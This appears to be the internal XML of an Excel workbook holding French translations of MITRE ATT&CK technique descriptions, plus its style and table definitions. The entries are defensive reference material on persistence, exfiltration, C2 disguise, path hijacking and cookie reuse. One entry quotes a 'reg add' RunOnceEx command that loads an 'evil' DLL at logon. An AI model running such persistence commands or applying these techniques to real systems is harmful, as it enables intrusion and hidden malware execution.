Pour des raisons d’efficacité, de nombreux protocoles (y compris SSL/TLS) utilisent la cryptographie symétrique une fois qu’une connexion est établie, mais utilisent la cryptographie asymétrique pour établir ou transmettre une clé. En tant que tels, ces protocoles sont classés comme [Cryptographie asymétrique](https://attack.mitre.org/techniques/T1573/002).
https://attack.mitre.org/techniques/T1573/002</t>
  </si>
  <si>
    <t>Les adversaires peuvent exfiltrer des données vers un service de stockage dans le cloud plutôt que sur leur canal de commande et de contrôle principal. Les services de stockage dans le cloud permettent de stocker, de modifier et d’extraire des données à partir d’un serveur de stockage cloud distant sur Internet.
Dropbox et Google Docs sont des exemples de services de stockage en nuage. L’exfiltration vers ces services de stockage dans le cloud peut fournir une couverture importante à l’adversaire si les hôtes du réseau communiquent déjà avec le service.
https://attack.mitre.org/techniques/T1567/002</t>
  </si>
  <si>
    <t>Les adversaires peuvent transférer des outils ou d’autres fichiers entre des systèmes dans un environnement compromis. Une fois introduits dans l’environnement victime (c’est-à-dire [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105)), les fichiers peuvent ensuite être copiés d’un système à un autre pour mettre en scène des outils adversaires ou d’autres fichiers au cours d’une opération.
Les adversaires peuvent copier des fichiers entre des systèmes victimes internes pour prendre en charge les mouvements latéraux à l’aide de protocoles de partage de fichiers inhérents tels que le partage de fichiers via [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002) vers des partages de réseau connectés ou avec des connexions authentifiées via [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001). (Citation : Unit42 LockerGoga 2019)
Les fichiers peuvent également être transférés à l’aide d’outils natifs ou présents sur le système victime, tels que scp, rsync, curl, sftp et [ftp](https://attack.mitre.org/software/S0095). Dans certains cas, les adversaires peuvent être en mesure d’exploiter des [services Web]https://attack.mitre.org/techniques/T1102) tels que Dropbox ou OneDrive pour copier des fichiers d’un ordinateur à un autre via des dossiers partagés et synchronisés automatiquement. (Citation : Synchronisation des logiciels malveillants Dropbox)
https://attack.mitre.org/techniques/T1570</t>
  </si>
  <si>
    <t>Les adversaires peuvent exécuter leurs propres charges utiles malveillantes en détournant les références de chemin d’accès aux fichiers vulnérables. Les adversaires peuvent tirer parti des chemins d’accès qui ne sont pas entre guillemets en plaçant un exécutable dans un répertoire de niveau supérieur à l’intérieur du chemin, de sorte que Windows choisisse l’exécutable de l’adversaire à lancer.
Les chemins d’accès de service (Citation : Microsoft CurrentControlSet Services) et les chemins de raccourci peuvent également être vulnérables à l’interception de chemin si le chemin comporte un ou plusieurs espaces et n’est pas entouré de guillemets (par exemple, &lt;code&gt;C :\chemin non sécurisé avec espace\program.exe&lt;/code&gt; par rapport à &lt;code&gt;« C :\chemin sûr avec espace\program.exe&lt;/code&gt; »). (Citation : Aidez à éliminer le chemin non guilleté) (stocké dans les clés de registre Windows) Un adversaire peut placer un exécutable dans un répertoire de niveau supérieur du chemin d’accès, et Windows résoudra cet exécutable à la place de l’exécutable prévu. Par exemple, si le chemin d’accès d’un raccourci est &lt;code&gt;C :\program files\myapp.exe&lt;/code&gt;, un adversaire peut créer un programme à &lt;code&gt;C :\program.exe&lt;/code&gt; qui sera exécuté à la place du programme prévu. (Citation : Services Windows non cités) (Citation : Guide d’élévation des privilèges Windows)
Cette technique peut être utilisée pour la persistance si les exécutables sont appelés régulièrement, ainsi que pour l’élévation de privilèges si les exécutables interceptés sont démarrés par un processus à privilèges plus élevés.
https://attack.mitre.org/techniques/T1574/009</t>
  </si>
  <si>
    <t>Les adversaires peuvent installer des certificats SSL/TLS qui peuvent être utilisés lors du ciblage. Les certificats SSL/TLS sont des fichiers qui peuvent être installés sur des serveurs pour permettre des communications sécurisées entre les systèmes. Les certificats numériques incluent des informations sur la clé, des informations sur l’identité de son propriétaire et la signature numérique d’une entité qui a vérifié que le contenu du certificat est correct. Si la signature est valide et que la personne qui examine le certificat fait confiance au signataire, elle sait qu’elle peut utiliser cette clé pour communiquer en toute sécurité avec son propriétaire. Les certificats peuvent être téléchargés sur un serveur, puis le serveur peut être configuré pour utiliser le certificat afin d’activer la communication chiffrée avec celui-ci. (Citation : DigiCert Install SSL Cert)
Les adversaires peuvent installer des certificats SSL/TLS qui peuvent être utilisés pour poursuivre leurs opérations, telles que le chiffrement du trafic C2 (ex : [Cryptographie asymétrique](https://attack.mitre.org/techniques/T1573/002) avec [Protocoles Web](https://attack.mitre.org/techniques/T1071/001)) ou la crédibilité d’un site de collecte d’informations d’identification. L’installation de certificats numériques peut avoir lieu pour un certain nombre de types de serveurs, y compris les serveurs Web et les serveurs de messagerie. 
Les adversaires peuvent obtenir des certificats numériques (voir [Certificats numériques](https://attack.mitre.org/techniques/T1588/004)) ou créer des certificats auto-signés (voir [Certificats numériques](https://attack.mitre.org/techniques/T1587/003)). Les certificats numériques peuvent ensuite être installés sur une infrastructure contrôlée par l’adversaire qui peut avoir été acquise ([Acquérir l’infrastructure](https://attack.mitre.org/techniques/T1583)) ou précédemment compromise ([Compromettre l’infrastructure](https://attack.mitre.org/techniques/T1584)).
https://attack.mitre.org/techniques/T1608/003</t>
  </si>
  <si>
    <t>Les adversaires peuvent utiliser des éléments de démarrage exécutés automatiquement lors de l’initialisation du démarrage pour établir la persistance. Les éléments de démarrage s’exécutent pendant la phase finale du processus de démarrage et contiennent des scripts shell ou d’autres fichiers exécutables, ainsi que des informations de configuration utilisées par le système pour déterminer l’ordre d’exécution de tous les éléments de démarrage. (Citation : Éléments de démarrage)
Il s’agit techniquement d’une technologie obsolète (remplacée par [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)), et donc le dossier approprié, &lt;code&gt;/Library/StartupItems&lt;/code&gt;, n’est pas garanti d’exister sur le système par défaut, mais semble exister par défaut sur macOS Sierra. Un élément de démarrage est un répertoire dont l’exécutable et la liste de propriétés de configuration (plist), &lt;code&gt;StartupParameters.plist&lt;/code&gt;, résident dans le répertoire de niveau supérieur. 
Un adversaire peut créer les dossiers/fichiers appropriés dans le répertoire StartupItems pour enregistrer son propre mécanisme de persistance. (Citation : Méthodes de persistance des logiciels malveillants Mac) De plus, étant donné que les StartupItems s’exécutent pendant la phase de démarrage de macOS, ils s’exécutent en tant qu’utilisateur racine élevé.
https://attack.mitre.org/techniques/T1037/005</t>
  </si>
  <si>
    <t>Les adversaires peuvent tenter de recueillir des informations sur la langue du système d’une victime afin de déduire l’emplacement géographique de cet hôte. Ces informations peuvent être utilisées pour façonner des comportements de suivi, notamment si l’adversaire infecte la cible et/ou tente des actions spécifiques. Cette décision peut être utilisée par les développeurs et les opérateurs de logiciels malveillants pour réduire leur risque d’attirer l’attention d’organismes d’application de la loi spécifiques ou de poursuites/examens de la part d’autres entités. (Citation : Vérification de la langue du système de logiciels malveillants)
Il existe différentes sources de données qu’un adversaire peut utiliser pour déduire le langage du système, telles que les valeurs par défaut du système et la disposition du clavier. Les vérifications spécifiques varient en fonction de la cible et/ou de l’adversaire, mais peuvent impliquer des comportements tels que [Registre des requêtes](https://attack.mitre.org/techniques/T1012) et des appels aux fonctions [API native](https://attack.mitre.org/techniques/T1106). (Citation : CrowdStrike Ryuk, janvier 2019) 
Par exemple, sur un système Windows, les adversaires peuvent tenter de déduire la langue d’un système en interrogeant la clé de registre &lt;code&gt;HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Nls\Language&lt;/code&gt; ou en analysant les sorties des fonctions de l’API Windows &lt;code&gt;GetUserDefaultUILanguage&lt;/code&gt;, &lt;code&gt;GetSystemDefaultUILanguage&lt;/code&gt;, &lt;code&gt;GetKeyboardLayoutList&lt;/code&gt; et &lt;code&gt;GetUserDefaultLangID&lt;/code&gt;. (Citation : Darkside Ransomware Cybereason)(Citation : Securelist JSWorm)(Citation : SecureList SynAck Doppelgänging mai 2018)
Sur un système macOS ou Linux, les adversaires peuvent interroger les &lt;code&gt;paramètres régionaux&lt;/code&gt; pour récupérer la valeur de la variable d’environnement &lt;code&gt;$LANG&lt;/code&gt;.
https://attack.mitre.org/techniques/T1614/001</t>
  </si>
  <si>
    <t>Les adversaires peuvent utiliser un protocole OSI non applicatif pour la communication entre l’hôte et le serveur C2 ou entre les hôtes infectés au sein d’un réseau. La liste des protocoles possibles est longue. (Citation : Wikipédia OSI) Des exemples spécifiques incluent l’utilisation de protocoles de couche réseau, tels que l’Internet Control Message Protocol (ICMP Protocol), de protocoles de couche transport, tels que le protocole UDP (User Datagram Protocol), de protocoles de couche session, tels que Socket Secure (SOCKS), ainsi que de protocoles redirigés/tunnelisés, tels que Serial over LAN (SOL).
La communication ICMP entre les hôtes en est un exemple. (Citation : Cisco Synful Knock Evolution) Étant donné que ICMP fait partie de la suite de protocoles Internet, il doit être mis en œuvre par tous les hôtes compatibles IP. (Citation : Microsoft ICMP) Cependant, il n’est pas aussi couramment surveillé que d’autres protocoles Internet tels que TCP ou UDP et peut être utilisé par des adversaires pour masquer les communications.
https://attack.mitre.org/techniques/T1095</t>
  </si>
  <si>
    <t>Les adversaires peuvent utiliser des techniques de stéganographie afin d’empêcher la détection d’informations cachées. Les techniques stéganographiques peuvent être utilisées pour masquer des données dans des médias numériques tels que des images, des pistes audio, des clips vidéo ou des fichiers texte.
[Duqu](https://attack.mitre.org/software/S0038) était un des premiers exemples de logiciels malveillants utilisant la stéganographie. Il cryptait les informations recueillies à partir du système d’une victime et les cachait dans une image avant d’exfiltrer l’image vers un serveur C2. (Citation : Wikipédia Duqu) 
À la fin de l’année 2017, un groupe de menaces a utilisé &lt;code&gt;Invoke-PSImage&lt;/code&gt; pour masquer les commandes [PowerShell](https://attack.mitre.org/techniques/T1059/001) dans un fichier image (.png) et exécuter le code sur le système d’une victime. Dans ce cas particulier, le code [PowerShell](https://attack.mitre.org/techniques/T1059/001) a téléchargé un autre script obfusqué pour recueillir des informations sur l’ordinateur de la victime et les communiquer à l’adversaire. (Citation : Un document malveillant McAfee cible les Jeux olympiques de Pyeongchang)
https://attack.mitre.org/techniques/T1027/003</t>
  </si>
  <si>
    <t>Les adversaires peuvent compromettre les serveurs DNS tiers qui peuvent être utilisés lors du ciblage. Au cours de l’activité post-compromission, les adversaires peuvent utiliser le trafic DNS pour diverses tâches, notamment pour la commande et le contrôle (ex : [Application Layer Protocol](https://attack.mitre.org/techniques/T1071)). Au lieu de configurer leurs propres serveurs DNS, les adversaires peuvent compromettre des serveurs DNS tiers pour soutenir les opérations.
En compromettant les serveurs DNS, les adversaires peuvent modifier les enregistrements DNS. Un tel contrôle peut permettre de rediriger le trafic d’une organisation, facilitant ainsi les efforts de collecte et d’accès aux informations d’identification pour l’adversaire. (Citation : Talos DNSpionage novembre 2018)(Citation : FireEye DNS Hijack 2019)  De plus, les adversaires peuvent exploiter ce contrôle en conjonction avec les [Certificats numériques](https://attack.mitre.org/techniques/T1588/004) pour rediriger le trafic vers une infrastructure contrôlée par l’adversaire, imitant les communications réseau normales et fiables. (Citation : FireEye DNS Hijack 2019)(Citation : Crowdstrike DNS Hijack 2019) Les adversaires peuvent également être en mesure de créer silencieusement des sous-domaines pointés vers des serveurs malveillants sans informer le propriétaire réel du serveur DNS. (Citation : CiscoAngler)(Citation : Proofpoint Domain Shadowing)
https://attack.mitre.org/techniques/T1584/002</t>
  </si>
  <si>
    <t>Les adversaires peuvent se faire passer pour des protocoles légitimes ou du trafic de service Web pour dissimuler l’activité de commande et de contrôle et contrecarrer les efforts d’analyse. En se faisant passer pour des protocoles ou des services Web légitimes, les adversaires peuvent faire en sorte que leur trafic de commande et de contrôle se confond avec le trafic réseau légitime.  
Les adversaires peuvent se faire passer pour une fausse poignée de main SSL/TLS pour faire croire que le trafic suivant est chiffré SSL/TLS, ce qui peut interférer avec certains outils de sécurité, ou pour faire croire que le trafic est lié à une entité de confiance. 
Les adversaires peuvent également exploiter des protocoles légitimes pour usurper l’identité du trafic Web attendu ou de services de confiance. Par exemple, les adversaires peuvent manipuler les en-têtes HTTP, les points de terminaison d’URI, les certificats SSL et les données transmises pour dissimuler les communications C2 ou imiter des services légitimes tels que Gmail, Google Drive et Yahoo Messenger. (Citation : ESET Okrum juillet 2019)(Référence : Malléable-C2-U42)
https://attack.mitre.org/techniques/T1001/003</t>
  </si>
  <si>
    <t>Les adversaires peuvent interagir avec le registre Windows pour recueillir des informations sur le système, la configuration et les logiciels installés.
Le registre contient une quantité importante d’informations sur le système d’exploitation, la configuration, les logiciels et la sécurité. (Citation : Registre Windows de Wikipédia) Les informations peuvent facilement être interrogées à l’aide de l’utilitaire [Reg](https://attack.mitre.org/software/S0075), bien qu’il existe d’autres moyens d’accéder au registre. Certaines de ces informations peuvent aider les adversaires à poursuivre leurs opérations au sein d’un réseau. Les adversaires peuvent utiliser les informations du [Registre des requêtes](https://attack.mitre.org/techniques/T1012) lors de la découverte automatique pour façonner les comportements de suivi, notamment si l’adversaire infecte complètement la cible et/ou tente ou non des actions spécifiques.
https://attack.mitre.org/techniques/T1012</t>
  </si>
  <si>
    <t>Un adversaire peut exfiltrer des données en blocs de taille fixe au lieu de fichiers entiers ou limiter la taille des paquets en dessous de certains seuils. Cette approche peut être utilisée pour éviter de déclencher des alertes de seuil de transfert de données réseau.
https://attack.mitre.org/techniques/T1030</t>
  </si>
  <si>
    <t>Les adversaires peuvent utiliser des cookies de session volés pour s’authentifier auprès d’applications et de services Web. Cette technique contourne certains protocoles d’authentification multifactorielle puisque la session est déjà authentifiée. (Citation : Passez le cookie)
Les cookies d’authentification sont couramment utilisés dans les applications Web, y compris les services basés sur le cloud, une fois qu’un utilisateur s’est authentifié auprès du service afin que les informations d’identification ne soient pas transmises et que la réauthentification n’ait pas besoin d’être aussi fréquente. Les cookies sont souvent valables pour une période prolongée, même si l’application web n’est pas utilisée activement. Une fois que le cookie a été obtenu par le biais de [Steal Web Session Cookie](https://attack.mitre.org/techniques/T1539) ou [Web Cookies](https://attack.mitre.org/techniques/T1606/001), l’adversaire peut alors importer le cookie dans un navigateur qu’il contrôle et est alors en mesure d’utiliser le site ou l’application en tant qu’utilisateur tant que le cookie de session est actif. Une fois connecté au site, un adversaire peut accéder à des informations sensibles, lire des e-mails ou effectuer des actions que le compte victime est autorisé à effectuer.
Il y a eu des exemples de logiciels malveillants ciblant les cookies de session pour contourner les systèmes d’authentification multifacteur. (Citation : Unit 42 Mac Crypto Cookies Janvier 2019)
https://attack.mitre.org/techniques/T1550/004</t>
  </si>
  <si>
    <t>Les adversaires peuvent obtenir et abuser des informations d’identification d’un compte de domaine comme moyen d’obtenir l’accès initial, la persistance, l’élévation de privilèges ou l’évasion de la défense. (Citation : Vol d’informations d’identification TechNet) Les comptes de domaine sont ceux gérés par les services de domaine Active Directory où l’accès et les autorisations sont configurés sur les systèmes et services qui font partie de ce domaine. Les comptes de domaine peuvent couvrir les utilisateurs, les administrateurs et les services. (Citation : Comptes Microsoft AD)
Les adversaires peuvent compromettre les comptes de domaine, certains avec un niveau élevé de privilèges, par divers moyens tels que le [déchargement des informations d’identification du système d’exploitation](https://attack.mitre.org/techniques/T1003) ou la réutilisation du mot de passe, permettant d’accéder aux ressources privilégiées du domaine.
https://attack.mitre.org/techniques/T1078/002</t>
  </si>
  <si>
    <t>Les adversaires peuvent abuser de Regsvcs et de Regasm pour proxy l’exécution de code via un utilitaire Windows de confiance. Regsvcs et Regasm sont des utilitaires de ligne de commande Windows utilisés pour enregistrer des assemblys .NET [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM). Les deux sont des fichiers binaires qui peuvent être signés numériquement par Microsoft. (Référence : MSDN Regsvcs) (Citation : MSDN Regasm)
Les deux utilitaires peuvent être utilisés pour contourner le contrôle de l’application en utilisant des attributs dans le binaire pour spécifier le code qui doit être exécuté avant l’inscription ou la désinscription : &lt;code&gt;[ComRegisterFunction]&lt;/code&gt; ou &lt;code&gt;[ComUnregisterFunction]&lt;/code&gt; respectivement. Le code avec les attributs d’inscription et de désinscription sera exécuté même si le processus est exécuté avec des privilèges insuffisants et ne parvient pas à s’exécuter. (Référence : LOLBAS Regsvcs)(Citation : LOLBAS Regasm)
https://attack.mitre.org/techniques/T1218/009</t>
  </si>
  <si>
    <t xml:space="preserve">Les adversaires peuvent obtenir la persistance en ajoutant un programme à un dossier de démarrage ou en le référençant avec une clé d'exécution du Registre. L'ajout d'une entrée aux « clés d'exécution » dans le registre ou le dossier de démarrage entraîne l'exécution du programme référencé lorsqu'un utilisateur se connecte.(Citation : Microsoft Run Key) Ces programmes sont exécutés dans le contexte de l'utilisateur et disposent du niveau d'autorisation associé au compte.
Les clés d'exécution suivantes sont créées par défaut sur les systèmes Windows :
* &lt;code&gt;HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run&lt;/code&gt;
* &lt;code&gt;HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce&lt;/code&gt;
* &lt;code&gt;HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run&lt;/code&gt;
* &lt;code&gt;HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce&lt;/code&gt;
Les clés d'exécution peuvent exister sous plusieurs ruches (Citation : Microsoft Wow6432Node 2018) (Citation : Malwarebytes Wow6432Node 2016) La clé HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnceEx est également disponible, mais elle n'est pas créée par défaut sur Windows Vista et les versions plus récentes. Les entrées de clé d'exécution du registre peuvent faire référence à des programmes directement ou les lister en tant que dépendance. (Citation : Microsoft Run Key) Par exemple, il est possible de charger une DLL à l'ouverture de session en utilisant une clé « »Depend« » avec RunOnceEx : reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d « »C:\tempevil[.]dll« » (Citation : Oddvar Moe RunOnceEx Mar 2018)
Placing a program within a startup folder will also cause that program to execute when a user logs in. There is a startup folder location for individual user accounts as well as a system-wide startup folder that will be checked regardless of which user account logs in. Le chemin du dossier de démarrage de l'utilisateur actuel est le suivant: &lt;code&gt;C:\Users\[Username]\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup&lt;/code&gt;. Le chemin du dossier de démarrage pour tous les utilisateurs est le suivant: &lt;code&gt;C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp&lt;/code&gt;.
Les clés de registre suivantes peuvent être utilisées pour définir les éléments du dossier de démarrage pour la persistance :
* &lt;code&gt;HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders&lt;/code&gt;
* &lt;code&gt;HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders&lt;/code&gt;
* &lt;code&gt;HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders&lt;/code&gt;
* &lt;code&gt;HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders&lt;/code&gt;
Les clés de registre suivantes peuvent contrôler le démarrage automatique des services lors de l'amorçage :
* &lt;code&gt;HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce&lt;/code&gt;
* &lt;code&gt;HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce&lt;/code&gt;
* &lt;code&gt;HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices&lt;/code&gt;
* &lt;code&gt;HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServices&lt;/code&gt;
L'utilisation des paramètres de stratégie pour spécifier les programmes de démarrage crée des valeurs correspondantes dans l'une des deux clés du registre :
* &lt;code&gt;HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run&lt;/code&gt;
* &lt;code&gt;HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run&lt;/code&gt;
Les programmes répertoriés dans la valeur de chargement de la clé de registre &lt;code&gt;HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows&lt;/code&gt; s'exécutent automatiquement pour l'utilisateur actuellement connecté.
Par défaut, la valeur multistring BootExecute de la clé de registre HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager est définie sur &lt;code&gt;autocheck autochk *&lt;/code&gt;. Cette valeur permet à Windows de vérifier, au démarrage, l'intégrité du système de fichiers des disques durs si le système a été arrêté de manière anormale. Les adversaires peuvent ajouter d'autres programmes ou processus à cette valeur de registre qui se lancera automatiquement au démarrage.
Les adversaires peuvent utiliser ces emplacements de configuration pour exécuter des logiciels malveillants, tels que des outils d'accès à distance, afin de maintenir la persistance à travers les redémarrages du système. Les adversaires peuvent également utiliser le [Masquerading] (https://attack.mitre.org/techniques/T1036) pour faire croire que les entrées du registre sont associées à des programmes légitimes.
https://attack.mitre.org/techniques/T1547/001"
</t>
  </si>
  <si>
    <t>Les adversaires peuvent établir une persistance en exécutant des commandes malveillantes déclenchées par le shell d'un utilisateur. Les utilisateurs [Unix Shell] (https://attack.mitre.org/techniques/T1059/004) exécutent plusieurs scripts de configuration à différents moments de la session en fonction des événements. Par exemple, lorsqu'un utilisateur ouvre une interface de ligne de commande ou se connecte à distance (via SSH, par exemple), un shell de connexion est lancé. L'interpréteur de commandes de connexion exécute des scripts du système (&lt;code&gt;/etc&lt;/code&gt;) et du répertoire personnel de l'utilisateur (&lt;code&gt;~/&lt;/code&gt;) pour configurer l'environnement. Tous les shells de connexion d'un système utilisent /etc/profile lorsqu'ils sont lancés. Ces scripts de configuration s'exécutent au niveau de permission de leur répertoire et sont souvent utilisés pour définir des variables d'environnement, créer des alias et personnaliser l'environnement de l'utilisateur. Lorsque l'interpréteur de commandes quitte ou se termine, d'autres scripts sont exécutés pour s'assurer que l'interpréteur de commandes quitte correctement le système.
Les adversaires peuvent tenter d'établir la persistance en insérant des commandes dans les scripts exécutés automatiquement par les interpréteurs de commandes. En prenant l'exemple de bash, l'interpréteur de commandes par défaut de la plupart des systèmes GNU/Linux, les adversaires peuvent ajouter des commandes qui lancent des binaires malveillants dans les fichiers /etc/profile et /etc/profile.d(Citation : intezer-kaiji-malware)(Citation : bencane blog bashrc)Ces fichiers nécessitent généralement les autorisations de l'administrateur pour être modifiés et sont exécutés à chaque fois qu'un interpréteur de commandes est lancé sur un système. Pour les autorisations de niveau utilisateur, les adversaires peuvent insérer des commandes malveillantes dans~/.bash_profile, ~/.bash_login, ou ~/.profile qui sont recherchées lorsqu'un utilisateur ouvre une interface de ligne de commande ou se connecte à distance.(Citation : anomali-rocke-tactics)(Citation : Linux manual bash invocation) Étant donné que le système n'exécute que le premier fichier existant dans l'ordre de la liste, les adversaires ont utilisé ~/.bash_profile pour garantir l'exécution. Ils ont également exploité le fichier ~/.bashrc qui est exécuté en plus si la connexion est établie à distance ou si un shell interactif supplémentaire est ouvert, comme un nouvel onglet dans l'interface de ligne de commande. (Citation : Tsunami)(Citation : anomali-rocke-tactics)(Citation : anomali-linux-rabbit)(Citation : Magento) Certains logiciels malveillants ciblent la fin d'un programme pour en déclencher l'exécution, les adversaires peuvent utiliser le fichier ~/.bash_logout pour exécuter des commandes malveillantes à la fin d'une session.
Pour macOS, la fonctionnalité de cette technique est similaire mais peut s'appuyer sur zsh, l'interpréteur de commandes par défaut de macOS 10.15+. Lorsque Terminal.app est ouvert, l'application lance un shell de connexion zsh et un shell interactif zsh. Le shell de connexion configure l'environnement système à l'aide de &lt;code&gt;/etc/profile&lt;/code&gt;, &lt;code&gt;/etc/zshenv&lt;/code&gt;, &lt;code&gt;/etc/zprofile&lt;/code&gt;, et &lt;code&gt;/etc/zlogin&lt;/code&gt;. (Citation : ScriptingOSX zsh)(Citation : PersistentJXA_leopitt)(Citation : code_persistence_zsh)(Citation : macOS MS office sandbox escape) L'interpréteur de commandes configure ensuite l'environnement utilisateur avec &lt;code&gt;~/.zprofile&lt;/code&gt; et &lt;code&gt;~/.zlogin&lt;/code&gt;. L'interpréteur de commandes interactif utilise le &lt;code&gt;~/.zshrc&lt;/code&gt; pour configurer l'environnement utilisateur. À la sortie, &lt;code&gt;/etc/zlogout&lt;/code&gt; et &lt;code&gt;~/.zlogout&lt;/code&gt; sont exécutés. Pour les anciens programmes, macOS exécute &lt;code&gt;/etc/bashrc&lt;/code&gt; au démarrage.
https://attack.mitre.org/techniques/T1546/004</t>
  </si>
  <si>
    <t>AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAa</t>
  </si>
  <si>
    <t>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</si>
</sst>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4" x14ac:knownFonts="1">
    <font>
      <sz val="11"/>
      <color theme="1"/>
      <name val="Calibri"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <b/>
      <sz val="12"/>
      <color theme="0"/>
      <name val="Calibri"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="8"/>
      <name val="Calibri"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="12"/>
      <name val="Calibri"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
  </fonts>
  <fills count="3">
    <fill>
      <patternFill patternType="none"/>
    </fill>
    <fill>
      <patternFill patternType="gray125"/>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor theme="4"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
  </fills>
  <borders count="1">
    <border>
      <left/>
      <right/>
      <top/>
      <bottom/>
      <diagonal/>
    </border>
  </borders>
  <cellStyleXfs count="1">
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0"/>
  </cellStyleXfs>
  <cellXfs count="6">
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0"/>
    <xf numFmtId="0" fontId="1" fillId="2" borderId="0" xfId="0" applyFont="1" applyFill="1"/>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="2" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="49" fontId="0" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
  </cellXfs>
  <cellStyles count="1">
    <cellStyle name="Normal" xfId="0" builtinId="0"/>
  </cellStyles>
  <dxfs count="8">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font>
        <b/>
        <i val="0"/>
        <strike val="0"/>
        <condense val="0"/>
        <extend val="0"/>
        <outline val="0"/>
        <shadow val="0"/>
        <u val="none"/>
        <vertAlign val="baseline"/>
        <sz val="12"/>
        <color theme="0"/>
        <name val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </font>
      <fill>
        <patternFill patternType="solid">
          <fgColor indexed="64"/>
          <bgColor theme="4"/>
        </patternFill>
      </fill>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s>
  <tableStyles count="1" defaultTableStyle="TableStyleMedium9" defaultPivotStyle="PivotStyleLight16">
    <tableStyle name="Style de tableau 1" pivot="0" count="0" xr9:uid="{7BFF6249-B87D-4831-86DB-7C6070BE08E5}"/>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2B00483-E3F9-4C14-B125-41886D9D0F23}" name="Tableau1" displayName="Tableau1" ref="A1:E1048576" totalsRowShown="0">
  <autoFilter ref="A1:E1048576" xr:uid="{32B00483-E3F9-4C14-B125-41886D9D0F23}"/>
  <tableColumns count="5">
    <tableColumn id="1" xr3:uid="{EAB65DE4-E96C-4DC4-BA6C-A593AAD4C4DF}" name="ref_id"/>
    <tableColumn id="2" xr3:uid="{5B2E25D5-055C-4CC2-BE38-92B7E2F2AAF5}" name="name" dataDxfId="7"/>
    <tableColumn id="3" xr3:uid="{5152A5DB-181A-4CBA-ACD0-0DD1623FBF9A}" name="description" dataDxfId="6"/>
    <tableColumn id="4" xr3:uid="{A9C1AFAB-FD44-4CA8-AF8F-85DDC92A390C}" name="name[fr]" dataDxfId="5">
      <calculatedColumnFormula>_xlfn.TRANSLATE(Tableau1[[#This Row],[name]],"en","fr")</calculatedColumnFormula>
    </tableColumn>
    <tableColumn id="5" xr3:uid="{703428ED-D747-42EA-B555-22555B939ABD}" name="description[fr]" dataDxfId="4">
      <calculatedColumnFormula>_xlfn.TRANSLATE(Tableau1[[#This Row],[description]],"en","fr")</calculatedColumnFormula>
    </tableColumn>
  </tableColumns>
  <tableStyleInfo name="Style de tableau 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748F8BA-F2F9-4976-90F0-1D6F9F26191B}" name="Tableau3" displayName="Tableau3" ref="A1:G1048576" totalsRowShown="0" headerRowDxfId="3">
  <autoFilter ref="A1:G1048576" xr:uid="{4748F8BA-F2F9-4976-90F0-1D6F9F26191B}"/>
  <tableColumns count="7">
    <tableColumn id="1" xr3:uid="{24C825FC-EA07-41BC-98C9-F8FBC3F7C900}" name="ref_id"/>
    <tableColumn id="2" xr3:uid="{C2957CD0-1567-4E27-B892-80D163BFF61A}" name="name"/>
    <tableColumn id="3" xr3:uid="{3FB0D0A9-3BBE-484F-9C46-708CE2F2CA5E}" name="csf_function"/>
    <tableColumn id="4" xr3:uid="{5AF2AF1F-0C38-4C5C-8E23-C5BF504D29EF}" name="category"/>
    <tableColumn id="5" xr3:uid="{A614F9DD-DFFB-4E2A-8855-C1B6CAC4AC07}" name="description" dataDxfId="2"/>
    <tableColumn id="6" xr3:uid="{43428143-7159-4078-8828-576BEE7EB98C}" name="name[fr]" dataDxfId="1">
      <calculatedColumnFormula>_xlfn.TRANSLATE(Tableau3[[#This Row],[name]],"en","fr")</calculatedColumnFormula>
    </tableColumn>
